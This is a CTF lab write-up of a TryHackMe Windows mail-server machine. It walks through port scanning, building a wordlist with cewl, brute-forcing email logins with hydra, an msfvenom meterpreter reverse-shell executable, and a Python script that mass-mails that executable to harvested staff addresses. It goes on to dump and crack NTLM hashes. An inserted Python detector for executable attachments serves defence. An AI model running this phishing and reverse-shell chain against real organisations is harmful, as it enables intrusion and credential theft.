Test your recon and phishing skills in order to complete your objective.
Intro.
Welcome everyone, today I want to go through this TryHackMe machine. Its name is quite interesting. I do not often like Windows machines, but this one seems interesting, so let's dive into it.
Port scanning.
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 syn-ack hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
143/tcp open imap syn-ack hMailServer imapd
|_imap-capabilities: QUOTA CHILDREN SORT RIGHTS=texkA0001 CAPABILITY OK IDLE completed IMAP4 ACL IMAP4rev1 NAMESPACE
445/tcp open microsoft-ds? syn-ack
587/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-20T03:30:16
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 41825/tcp): CLEAN (Couldn't connect)
| Check 2 (port 56260/tcp): CLEAN (Couldn't connect)
| Check 3 (port 64713/udp): CLEAN (Failed to receive data)
| Check 4 (port 56873/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
Looks like a typical Windows machine, except that it has SMTP and POP3, both of which are used for email.
The website.
So in the machine instructions we can see that there is a domain assigned to us to enumerate, but only passively.
You are a penetration tester who has recently been requested to perform a security assessment for Brik. You are permitted to perform active assessments on MACHINE_IP and strictly passive reconnaissance on brownbrick.co. The scope includes only the domain and IP provided and does not include other TLDs.
On the website there is nothing interesting but these emails and names. I tried to perform some OSINT on these people, but I came up with nothing.
Then I checked Mr. Bob's walk-through and learned that we can use cewl, a tool for building a password list from the words on a website. You can check more here.
To get the password list.
cewl --lowercase https://brownbrick.co/ > passwords.txt
Using hydra we can brute-force the emails we found, hoping to get something.
And as you can see, we get a valid credential. Now we can send some emails using sendEmail.
But first we need some sort of payload to get a shell on the target system. I used msfvenom to generate it, but you can use whatever you want as long as it is an exe file.
Generate the reverse shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.96.110 LPORT=8888 -f exe -o shell.exe
Setting up Metasploit to accept the connection.
msfconsole
use multi/handler
set lhost <your interface name>
set lport <port from the msfvenom>
set payload windows/meterpreter/reverse_tcp
exploit
I used this Python code to automate the sending process for all the emails.
import subprocess

# Recipient addresses gathered from the website (space-separated, split into a list).
emails = "oaurelius@brownbrick.co tchikondi@brownbrick.co pcathrine@brownbrick.co stamatis@brownbrick.co wrohit@brownbrick.co"
email_list = emails.split(" ")
for i in email_list:
    # sendEmail flags: -f sender, -t recipient, -u subject, -m body, -a attachment,
    # -s SMTP server:port, -xu/-xp the credentials found with hydra.
    cmd = f'sendEmail -f "lhedvig@brownbrick.co" -t {i} -u "test" -m "test" -a shell.exe -s 10.10.156.238:25 -xu "lhedvig@brownbrick.co" -xp "bricks"'
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    print(f"Email sent to: {i}, Output: {result.stdout}, Error: {result.stderr}")
Once we run this and make sure it is sending the emails successfully, we wait for the connection.
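As an added example that is not part of the original write-up, here is detection logic a mail administrator could run over delivered messages to flag the pattern used above: executable attachments fanned out from one account to many recipients. The messages and addresses below are constructed placeholders, not real traffic.

```python
from collections import defaultdict
from email import message_from_string
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import parseaddr
# Extensions Windows will execute directly, plus the DOS/PE magic to catch renamed binaries.
EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".bat", ".ps1", ".js", ".vbs", ".dll"}
PE_MAGIC = b"MZ"

def attachment_findings(raw_message: str) -> list:
    """Return one reason per attachment that looks executable, else an empty list."""
    findings = []
    for part in message_from_string(raw_message).walk():
        name = part.get_filename()
        if not name:
            continue  # body text or a container part, not an attachment
        ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
        data = part.get_payload(decode=True) or b""
        if ext in EXEC_EXTENSIONS:
            findings.append(f"{name}: executable extension {ext}")
        elif data.startswith(PE_MAGIC):
            findings.append(f"{name}: PE header behind a non-executable name")
    return findings

def mass_mailers(raw_messages: list, threshold: int = 3) -> dict:
    # sender -> sorted recipients, for senders spreading flagged attachments widely
    seen = defaultdict(set)
    for raw in raw_messages:
        if attachment_findings(raw):
            msg = message_from_string(raw)
            seen[parseaddr(msg["From"])[1]].add(parseaddr(msg["To"])[1])
    return {s: sorted(r) for s, r in seen.items() if len(r) >= threshold}

def build_sample(sender: str, to: str, filename: str, payload: bytes) -> str:
    """Constructed sample message (not real traffic) carrying one attachment."""
    msg = MIMEMultipart()
    msg["From"], msg["To"], msg["Subject"] = sender, to, "test"
    msg.attach(MIMEText("test"))
    part = MIMEApplication(payload, Name=filename)
    part["Content-Disposition"] = f'attachment; filename="{filename}"'
    msg.attach(part)
    return msg.as_string()

# Constructed corpus: one account sends a PE to several colleagues, plus one benign mail.
SAMPLES = [build_sample("sender@example.test", f"user{i}@example.test",
                        "shell.exe", b"MZ\x90\x00" + b"\x00" * 60) for i in range(4)]
SAMPLES.append(build_sample("sender@example.test", "user9@example.test",
                            "invoice.pdf", b"MZ\x90\x00fake"))  # renamed PE
SAMPLES.append(build_sample("hr@example.test", "user1@example.test",
                            "policy.pdf", b"%PDF-1.4 harmless"))
```

Running `mass_mailers(SAMPLES)` returns only the account that reached more than the threshold of distinct recipients with flagged attachments; the renamed PE is still caught by the header check.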
Now we can navigate to the home of the user wrohit.
Wrohit password.
From our same Meterpreter session we can use hashdump to get the NTLM hashes.
Let's crack it with john.
john --wordlist=../../Downloads/rockyou.txt ./hashes --format=nt
Administrator password.
Lastly, it asks us for the Administrator dashboard password.
This one is quite simple: after searching a bit, there are two interesting files for hMailServer.